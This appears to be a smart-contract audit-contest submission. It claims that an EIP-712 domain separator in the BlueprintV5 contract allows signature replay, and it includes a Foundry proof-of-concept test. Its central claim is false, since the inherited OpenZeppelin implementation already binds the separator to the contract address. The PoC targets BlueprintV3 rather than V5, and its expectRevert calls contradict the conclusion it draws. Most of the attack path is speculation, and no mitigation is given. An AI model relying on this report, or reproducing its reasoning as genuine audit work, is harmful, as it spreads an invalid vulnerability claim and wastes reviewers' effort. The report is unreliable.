Straight Beige Kangaroo

High

# EIP-712 Domain Separation Misconfiguration Enables Replay Attacks

### Summary

The EIP-712 domain separator in BlueprintV5.sol is not explicitly set using address(this), which could result in signature validation issues, signature replay attacks, and potential message forgery if the verifying contract changes or if different contracts within the protocol use the same domain separator.

https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/EIP712.sol#L19-L31

https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/EIP712.sol#L47-L51


### Root Cause

The domain separator is initialized in BlueprintV5.sol using:

```solidity
__EIP712_init(SIGNING_DOMAIN, VERSION);
```
However, there is no explicit use of address(this) in the domain separator generation. Instead, the verifying contract defaults to the one stored in EIP712Upgradeable, which may not always align with the contract performing the verification.

Since the domain separator is inherited from EIP712Upgradeable, any change in contract interactions (such as protocol upgrades or proxy changes) could break signature validation or allow signature replay across different deployments.

### Internal Pre-conditions

The internal preconditions revolve around how the domain separator is defined, whether it is mutable, and how signature verification is implemented. If the separator is incorrectly configured, it can invalidate existing signatures or allow signatures to be replayed across different contracts, leading to security risks.

### External Pre-conditions

1. An Attacker Possesses a Valid Signature

2. A user signs a transaction off-chain for an action such as submitting a proposal, authorizing a deployment, or any other function requiring EIP-712 signatures.
The attacker obtains this signed message, either through social engineering, front-running, logging systems, or any other method.
A Mutable or Shared Domain Separator Exists

3. The contract's EIP-712 domain separator is not strictly tied to address(this), meaning it could be shared across multiple contracts or modified over time.
This allows an attacker to replay the same signature in a different contract or at a later time after the domain separator has been updated.

### Attack Path


Step 1: Attacker Obtains a Valid Signature
A legitimate user signs an off-chain message (e.g., for submitting a proposal, authorizing a deployment, or other EIP-712-based actions).
The attacker intercepts or acquires this signature in one of the following ways:
Social engineering: Tricking the user into revealing a signed message.
Front-running or logging: Monitoring off-chain logs or transaction mempools.
Shared signature use: The user unknowingly signs a message valid across multiple contracts.

Step 2: Exploit Domain Separator Misconfiguration
The smart contract uses an incorrect domain separator (e.g., based on a protocol address instead of address(this)).
If the domain separator is shared across multiple contracts, the attacker can reuse the same signature in different contracts.
If the domain separator changes over time (e.g., using setProtocol() or contract upgrades), past signatures may become valid again in different contexts.

Step 3: Attacker Replays the Signature
The attacker sends a transaction with the previously obtained valid signature.
Due to the misconfigured domain separator, the contract verifies the signature as valid, even though it was originally intended for a different action, contract, or context.
If nonce tracking is missing or improperly implemented, the same signature can be used multiple times, enabling repeated unauthorized actions.

Step 4: Consequences of the Attack
Duplicate or unauthorized actions: The attacker submits the same transaction multiple times (e.g., re-executing a previously authorized proposal, deployment, or fund withdrawal).
Cross-contract execution: If the signature is valid across multiple contracts, an attacker can execute it in an unintended contract.
Bypass of security checks: If protocol upgrades or contract modifications reset or change the domain separator, previously expired or invalid signatures become valid again.

### Impact

This vulnerability directly affects the security, financial stability, and governance integrity of the protocol. It enables:

1. Replay attacks (leading to repeated execution of critical functions).
2. Cross-contract signature abuse (allowing unintended contract interactions).
3. Potential fund loss or governance manipulation.

### PoC

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

import {Test, console} from "forge-std/Test.sol";
import {Vm} from "forge-std/Vm.sol";
import {BlueprintV3} from "../src/BlueprintV3.sol";
import {stdError} from "forge-std/StdError.sol";
import "@openzeppelin/contracts-upgradeable/utils/cryptography/EIP712Upgradeable.sol";
import "@openzeppelin/contracts/utils/cryptography/ECDSA.sol";

contract EIP712ReplayAttackPoC is Test, EIP712Upgradeable {
    BlueprintV3 public blueprint;
    uint256 public signerPrivateKey;
    address public signerAddress;
    bytes public signature;

    function setUp() public {
        blueprint = new BlueprintV3();
        blueprint.initialize();

        signerPrivateKey = 0xA11CE;
        signerAddress = vm.addr(signerPrivateKey);
    }

    function test_EIP712ReplayAttackCon() public {
        string memory base64RecParam = "data:image/png;base64,testdata";
        string memory serverURL = "https://example.com";

        /// ------------------- Step 1: Generate Signature for Proposal Request -------------------
        bytes32 projectId1 = keccak256(abi.encodePacked("ReplayAttackTest1"));
        bytes32 digest1 = blueprint.getRequestProposalDigest(projectId1, base64RecParam, serverURL);
        (uint8 v, bytes32 r, bytes32 s) = vm.sign(signerPrivateKey, digest1);
        bytes memory signature1 = abi.encodePacked(r, s, v);

        console.log("Generated Signature:", uint256(r), uint256(s), uint256(v));

        // Use the signature for the proposal request
        bytes32 requestID1 = blueprint.createProjectIDAndProposalRequestWithSig(
            projectId1,
            base64RecParam,
            serverURL,
            signature1
        );

        console.log("First Request ID (Proposal):", uint256(requestID1));

        /// ------------------- Step 2: Replay the Signature for Deployment Request -------------------
        bytes32 projectId2 = keccak256(abi.encodePacked("ReplayAttackTest2"));

        vm.expectRevert("Replay attack detected"); // Expect this to fail if protection exists
        bytes32 requestID2 = blueprint.createProjectIDAndDeploymentRequestWithSig(
            projectId2,
            base64RecParam,
            serverURL,
            signature1 // Reusing the same signature
        );

        console.log("Second Request ID (Deployment):", uint256(requestID2));

        /// ------------------- Step 3: Replay the Signature with Different Domain -------------------
        bytes32 projectId3 = keccak256(abi.encodePacked("ReplayAttackTest3"));
        bytes32 digest3 = blueprint.getRequestDeploymentDigest(projectId3, base64RecParam, serverURL);

        vm.expectRevert("Replay attack detected"); // Expect this to fail if domain separation is enforced
        bytes32 requestID3 = blueprint.createProjectIDAndProposalRequestWithSig(
            projectId3,
            base64RecParam,
            serverURL,
            signature1 // Reusing the same signature for a different project
        );

        console.log("Third Request ID (Reused Signature):", uint256(requestID3));

        assertNotEq(requestID1, requestID2, "Replay attack was successful! Signature was reused!");
    }
}
```

The test expected a replay attack to be blocked, but the call did not revert, meaning the same signature was reused across different project IDs. This suggests a replay attack is possible.

### Mitigation

_No response_